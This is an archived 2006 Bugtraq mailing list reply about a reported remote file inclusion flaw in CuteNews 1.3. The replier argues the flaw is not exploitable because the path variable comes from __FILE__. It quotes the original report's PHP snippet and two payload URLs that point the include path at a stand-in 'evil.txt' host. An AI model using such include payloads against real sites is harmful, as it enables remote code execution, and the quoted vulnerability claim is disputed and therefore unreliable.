| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 02 Sep 2006 21:46:03 +0200
From: satalin <satalin@...il.com>
To: bugtraq@...urityfocus.com
Subject: Re: CuteNews 1.3.* Remote File Include Vulnerability
stormhacker@...mail.com wrote:
>
> -----------------Description---------------
>
>
> $cutepath = __FILE__;
>
> $cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
>
> $cutepath = preg_replace( "'/search\.php'", "", $cutepath);
>
>
> require_once("$cutepath/inc/functions.inc.php");
>
>
> --------------PoC/Exploit----------------------
>
>
> show_news.php?cutepath=http://host/evil.txt?
>
> search.php?cutepath=http://host/evil.txt?
>
$cutepath = __FILE__;
$cutepath is set to script's working directory, so you can not set it
manually.
> --------------Solution---------------------
>
>
> No Patch available.
>
>
As no needed? ;)
Greets,
satalin
Powered by blists - more mailing lists